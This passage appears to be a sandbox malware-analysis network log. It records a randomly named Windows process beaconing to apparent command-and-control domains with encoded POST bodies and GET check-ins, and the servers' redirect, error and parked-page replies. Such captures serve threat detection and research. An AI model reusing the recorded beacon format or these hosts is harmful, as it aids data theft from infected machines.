Oct 21, 2024 17:25:54.643352985 CEST | 775 | OUT | POST /t10u/ HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.mondayigboleague.info
                                                                                                                          Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 46 2b 2f 74 68 52 53 49 33 4b 66 65 63 67 48 2b 37 76 41 52 73 74 58 6d 6a 62 39 59 43 56 41 6f 4c 32 32 55 42 57 53 37 76 4e 67 67 50 75 79 6b 34 55 64 79 4f 50 7a 6d 75 77 57 37 4c 54 2b 79 44 39 51 47 6a 67 6e 79 74 67 4a 5a 42 55 54 6e 4e 61 45 33 65 32 34 54 59 70 4c 58 41 65 79 6c 76 52 67 49 4c 4d 66 6c 68 4e 4a 42 6e 76 63 46 54 59 7a 2f 77 79 59 4e 78 59 70 76 4a 6b 4a 73 7a 41 58 52 62 48 7a 58 70 6b 6e 43 71 34 4b 76 2f 6c 6b 49 4e 4f 77 52 39 74 46 6f 5a 63 42 53 32 35 62 34 4b 2b 45 66 54 75 6b 4b 69 2b 59 75 66 50 79 50 6c 7a 61 44 6c 64 59 30 35 2f 52 67
                                                                                                                          Data Ascii: qFHlI=+0MuHPCNpm0aF+/thRSI3KfecgH+7vARstXmjb9YCVAoL22UBWS7vNggPuyk4UdyOPzmuwW7LT+yD9QGjgnytgJZBUTnNaE3e24TYpLXAeylvRgILMflhNJBnvcFTYz/wyYNxYpvJkJszAXRbHzXpknCq4Kv/lkINOwR9tFoZcBS25b4K+EfTukKi+YufPyPlzaDldY05/Rg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50008 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:57.201503038 CEST | 799 | OUT | POST /t10u/ HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.mondayigboleague.info
                                                                                                                          Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 6a 77 6f 4c 58 47 55 47 53 47 37 73 4e 67 67 42 4f 79 74 32 30 64 37 4f 50 2f 75 75 78 71 37 4c 51 43 79 44 39 41 47 6a 53 50 78 73 77 4a 58 4e 30 54 6c 4a 61 45 33 65 32 34 54 59 70 66 39 41 65 71 6c 75 68 51 49 4b 70 72 6d 76 74 4a 43 77 66 63 46 58 59 7a 7a 77 79 59 6a 78 61 64 46 4a 6e 68 73 7a 42 6e 52 62 53 66 55 6e 6b 6e 41 6b 59 4c 46 36 6c 6c 65 58 6f 31 54 69 61 70 33 46 73 42 4c 36 76 61 69 57 4e 45 38 42 2b 45 49 69 38 41 63 66 76 79 6c 6e 7a 69 44 33 4b 55 54 32 4c 30 44 69 48 49 67 72 65 43 78 71 6e 75 69 58 73 6d 75 54 76 64 6b 72 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCjwoLXGUGSG7sNggBOyt20d7OP/uuxq7LQCyD9AGjSPxswJXN0TlJaE3e24TYpf9AeqluhQIKprmvtJCwfcFXYzzwyYjxadFJnhszBnRbSfUnknAkYLF6lleXo1Tiap3FsBL6vaiWNE8B+EIi8AcfvylnziD3KUT2L0DiHIgreCxqnuiXsmuTvdkrw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50009 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:59.910567999 CEST | 1812 | OUT | POST /t10u/ HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.mondayigboleague.info
                                                                                                                          Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 67 51 6f 4c 6c 4f 55 47 77 75 37 74 4e 67 67 4a 75 79 6f 32 30 63 37 4f 50 6e 71 75 78 6e 4d 4c 56 47 79 46 66 34 47 72 44 50 78 6e 77 4a 58 46 55 54 67 4e 61 46 31 65 79 56 62 59 70 50 39 41 65 71 6c 75 69 49 49 63 4d 66 6d 74 74 4a 42 6e 76 63 4a 54 59 7a 66 77 79 67 56 78 5a 78 2f 49 57 42 73 39 42 33 52 5a 6b 72 55 76 6b 6e 47 70 34 4c 64 36 6c 6f 41 58 6f 42 70 69 66 56 4e 46 72 42 4c 2f 5a 53 2f 45 63 77 55 64 4e 73 43 37 38 41 73 58 4c 71 37 76 7a 61 6a 36 62 63 55 32 6f 52 76 6e 67 77 62 39 64 48 6c 2f 30 69 4e 4c 38 58 71 47 2b 6b 6f 34 44 77 32 4c 5a 43 72 73 6d 4c 55 64 59 43 4c 48 34 4b 44 77 44 33 47 7a 73 46 4b 67 72 53 46 4b 56 78 2f 4a 66 4e 64 4c 2f 45 78 64 74 72 41 79 37 31 69 49 4a 32 44 5a 43 79 30 46 59 48 47 4e 64 63 6a 70 5a 67 7a 44 42 4f 72 37 59 68 76 49 61 30 43 72 72 37 49 4e 4a 73 59 42 6d 56 73 4b 34 78 72 38 6d 33 48 73 35 71 50 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50010 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:02.454828024 CEST | 504 | OUT | GET /t10u/?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:26:04.854501963 CEST | 417 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:04 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 277
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 46 48 6c 49 3d 7a 32 6b 4f 45 36 48 64 77 31 55 31 4d 4c 58 6e 71 6d 57 54 39 76 61 39 65 33 2f 38 2b 50 56 74 76 76 72 30 78 35 68 57 45 69 34 53 46 32 53 48 42 47 6d 38 67 4e 68 7a 51 50 58 66 7a 33 38 2f 44 59 7a 2b 6c 67 62 6a 55 30 33 2f 53 34 67 61 6f 30 72 44 76 44 70 59 49 46 6e 41 4c 6f 70 79 65 43 45 34 65 35 37 6a 43 64 4b 6c 2b 53 51 34 4c 76 72 77 77 4c 42 4d 79 4f 6b 61 51 74 4c 77 72 45 67 34 77 76 67 3d 26 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 57327 | 217.70.184.50 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:10.623488903 CEST | 745 | OUT | POST /0bvj/ HTTP/1.1
                                                                                                                          Host: www.stocksm.fun
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.stocksm.fun
                                                                                                                          Referer: http://www.stocksm.fun/0bvj/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 71 39 57 37 57 73 4e 62 69 68 70 32 43 35 52 37 41 76 5a 32 31 51 42 52 5a 44 71 57 4e 59 4e 38 62 39 62 75 2b 44 4d 4a 36 30 2f 64 44 4e 71 50 75 4b 59 7a 4c 77 2b 73 4e 39 59 4c 42 73 4f 37 2f 64 57 31 69 74 36 36 69 48 65 61 53 44 73 4a 61 2f 67 67 2b 32 51 2f 65 55 6a 56 76 51 71 31 6f 43 54 31 39 49 6a 44 39 70 66 41 34 73 48 43 5a 46 32 67 2b 75 77 73 48 31 73 38 54 78 4a 59 38 6a 39 35 56 72 33 34 4a 57 79 47 43 69 49 6e 6f 68 31 2b 6d 72 54 31 30 45 63 63 6f 35 6f 4d 68 36 55 4e 47 52 6b 38 53 67 36 76 53 7a 52 68 70 6a 4c 65 2f 65 64 2f 38 73 67 72 70 69 48 6b 36 51 52 4f 49 78 5a 75 59 53 56
                                                                                                                          Data Ascii: qFHlI=Eq9W7WsNbihp2C5R7AvZ21QBRZDqWNYN8b9bu+DMJ60/dDNqPuKYzLw+sN9YLBsO7/dW1it66iHeaSDsJa/gg+2Q/eUjVvQq1oCT19IjD9pfA4sHCZF2g+uwsH1s8TxJY8j95Vr34JWyGCiInoh1+mrT10Ecco5oMh6UNGRk8Sg6vSzRhpjLe/ed/8sgrpiHk6QROIxZuYSV
Oct 21, 2024 17:26:11.174297094 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 57328 | 217.70.184.50 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:13.163052082 CEST | 769 | OUT | POST /0bvj/ HTTP/1.1
                                                                                                                          Host: www.stocksm.fun
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.stocksm.fun
                                                                                                                          Referer: http://www.stocksm.fun/0bvj/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 67 2f 59 52 56 71 4d 73 69 59 77 4c 77 2b 30 64 39 64 57 78 73 2f 37 2f 51 72 31 67 70 36 36 69 37 65 61 54 7a 73 4a 73 33 6e 67 75 32 53 71 4f 55 68 4c 66 51 71 31 6f 43 54 31 38 34 4a 44 39 78 66 44 49 77 48 44 38 70 78 71 65 75 76 6d 6e 31 73 34 54 77 4f 59 38 6a 50 35 55 32 71 34 4c 75 79 47 44 53 49 6b 36 5a 30 30 6d 71 35 6f 45 46 78 59 64 55 48 57 43 6e 78 49 77 51 42 73 43 45 64 71 6b 79 4c 39 61 6a 6f 4d 76 2b 66 2f 2b 30 53 72 4a 69 74 6d 36 6f 52 63 66 39 2b 68 73 33 32 46 49 72 6c 78 68 59 59 78 70 76 38 4d 78 7a 4c 59 52 69 6c 75 67 3d 3d
                                                                                                                          Data Ascii: qFHlI=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJIg/YRVqMsiYwLw+0d9dWxs/7/Qr1gp66i7eaTzsJs3ngu2SqOUhLfQq1oCT184JD9xfDIwHD8pxqeuvmn1s4TwOY8jP5U2q4LuyGDSIk6Z00mq5oEFxYdUHWCnxIwQBsCEdqkyL9ajoMv+f/+0SrJitm6oRcf9+hs32FIrlxhYYxpv8MxzLYRilug==
Oct 21, 2024 17:26:13.709779024 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:13 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 57329 | 217.70.184.50 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:15.710289955 CEST | 1782 | OUT | POST /0bvj/ HTTP/1.1
Host: www.stocksm.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.stocksm.fun
Referer: http://www.stocksm.fun/0bvj/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:26:16.281411886 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 21 Oct 2024 15:26:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 57330 | 217.70.184.50 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:18.250752926 CEST | 494 | OUT | GET /0bvj/?DJ=uNx48jdPyvmhqtM0&qFHlI=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYh+a9+td3GPcpjeWl06kCA+p4W4MdKq1Fwo+I6zMR0Ax5A/L5wR0= HTTP/1.1
Host: www.stocksm.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:26:18.810642004 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 21 Oct 2024 15:26:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Language
Data Ascii: 779<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>stocksm.fun</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whoi [TRUNCATED]
Oct 21, 2024 17:26:18.810723066 CEST | 878 | IN | Data Ascii: sm.fun"><strong>View the WHOIS results of stocksm.fun</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-bord


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 57333 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:23.979671001 CEST | 754 | OUT | POST /v2k8/ HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.drevohome.shop
Referer: http://www.drevohome.shop/v2k8/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=aRJkG/xjeaxIzO0rUu75rWibBvv/d8KvybnIEZZtU18Gv35O4Sn3YpIXtD7ZCi6V4O034BGKyFHr5aOkuwBQ0qLABxoIbLYquOwDaF/cQB8aemAHHEVFuq+8t3ulCAgw6MUxVX6kwkGARpxJnaZx0V3h4xHtJRLuA1gmQk7+i1lxaBSZQbadDqyPXd65Gzu0q9WJUv6rMupF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 57334 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:26.518501043 CEST | 778 | OUT | POST /v2k8/ HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.drevohome.shop
Referer: http://www.drevohome.shop/v2k8/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHIGvTxO5WT3bpIX1T7mMC7b4O4J4E+KyFTr5b+kuntP16LOHxoORrYquOwDaFr2QB0aeWwHVlVKoa+/7HulGAg06MUTVT6ewmuARrpJprZy+V3n2RGaAT6cZGwkbizT5mp3SXTDMoa+R6SNXfiLGTueo9uJG42MDaMm1Pm2xm7eAbU745BxuwxmTg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 57335 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:29.065884113 CEST | 1791 | OUT | POST /v2k8/ HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.drevohome.shop
Referer: http://www.drevohome.shop/v2k8/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 57336 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:26:31.618628025 CEST | 497 | OUT | GET /v2k8/?qFHlI=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM/qngBj8ZZb4M/OowV3zWfgcOAFUEQlNa1pKq422xJxUSmdUbTzU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:26:32.176753044 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 21 Oct 2024 15:26:32 GMT
Content-Type: text/html
Content-Length: 7468
Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
Connection: close
ETag: "606f145e-1d2c"
Accept-Ranges: bytes
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
